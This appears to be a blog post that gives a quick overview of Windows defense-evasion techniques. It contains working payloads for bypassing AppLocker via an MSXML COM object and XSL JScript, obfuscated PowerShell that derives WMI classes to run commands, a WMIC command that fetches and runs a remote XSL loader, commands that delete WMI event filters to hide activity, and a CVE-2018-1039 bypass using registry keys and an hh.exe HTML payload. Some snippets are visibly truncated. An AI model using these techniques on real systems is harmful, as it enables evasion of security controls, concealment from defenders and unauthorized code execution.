Skip to main content

Defenses Evasion (The Quick'n Dirty)

This is just a quick and dirty overview of some defense evasion tactics that are out there for some the common services / processes. I might post something in the future that dives into this deeper - if you don't want to wait for that day to come I'm sharing with you below some amazing resources and articles I've appreciated in the past.

Awesome tool for restricted env. evasion:



Application Identify Service (Process name: AppIDSvc)

                 The Application Identity service determines and verifies the identity of an app.
                 Stopping this service will prevent AppLocker policies from being enforced.

When using Group Policy, you must configure it to start automatically in at least one Group Policy Object (GPO) that applies AppLocker rules. This is because AppLocker uses this service to verify the attributes of a file.

Get-Service appidsvc

Bypass through COM object technique:

1) Store payload in XML file:

<?xml version='1.0'?>
	xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt"
	<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
		]]> </ms:script>

2) Use "COM" object to execute payload: 

$xsl = new-object -ComObject Msxml2.DoMDocument.6.0
$xsl.load("C:\Users\Victim\Documents\minimalist.xml") | out-null


Evade Detection and/or Restricted Environments

WMI Class Derivation (Evasion) with no "win32" prefix:

$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('MyEvilProcess')
Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe

Advanced WMI Class Derivation - presented at Security BsidesDublin 2019 talk.
Full details

# RandomName function:
function GenerateRandomName(){

    $Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay()
    1..10 | ForEach {  $rSVdssS1 += $Pf | Get-Random }
    return $rSVdssS1

# Class derivation
zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
$CoFtfEgvsJ = [wMicLaSs]$zNrF
$YepTa = "pRoc"+"eSs"
$PoDtbeF4Dp= GenerateRandomName
$N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp")
$CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\" # your command

# Payload execution:
iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$" # collect output (if needed)

Authenticated proxy bypass:
"Creates a TCP Tunnel through the default system proxy. As such, it automatically handles proxy authentication if ever required."

PowerShell without PowerShell + restricted env. escaping through WMIC XSL payload execution:

C:\Windows\System32\WMIC.exe os get /format:""

Blue team/detection mechanisms evasion for WMI lateral movements:
(Add following line to your payload to remove Windows "Applications" EvenViewer logs)

Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject


Antimalware Scan Interface (AMSI)

Identification (for ScanBuffer):
In a PowerShell terminal, enter “AmsiScanBuffer” (with double quotes)


Resources: (most recent techniques)


AppLocker demystification

"When whitelisting policies are enforced, PowerShell CLM is applied in AppLocker (for users in "Allowed Mode") and WDAC (for users and administrators)."

Error message: "This app has been blocked by your system Administrator"

1) use p0wnedShell via .xsl file + encryption (for Defender Bypass) for payload delivery (WMI)
Example: C:\Windows\System32\wbem\WMIC.exe os get /format:"https://tatamaster/p0wnedLoader.xsl"


P0wnedShell by Cn33liz:


Windows Lockdown Policy (WLDP aka Device Guard) with User Mode Code Integrity (UMCI) policy

When "enforced" by AppLocker policy, CLM COM object instantiation is very open.
In essence, (m)any COM object can be instantiated by default when WLDP is not active.
Under WDAC with UMCI, the WLDP greatly reduces this number (between 8 to 50 COM objects according to James Forshaw of Google Project Zero in this .NET COM Instantiation UMCI bypass disclosure write-up linked in "Resources" part).

Bypass based on CVE-2018-1039 by Google Project Zero:

1) Create a "keys.txt" file with following content:
	= REG_SZ WScript.Shell
	= REG_SZ {72C24DD5-D70A-438B-8A42-98424B88AFB8}
	HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
	HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}

	2) From the explorer Run dialog execute “regini path\to\keys.txt”

	3) Create a "shell.html" file with following content (our payload):
		    <object id="obj" classid="clsid:70B46225-C474-4852-BB81-48E0D36F9A5A">NO OBJECT</object>
			try {
			} catch (e) {

	4) Execute the HTML file from the Run dialog using "hh.exe path\to\shell.html"

Resources: (fixed on 5/08/2018)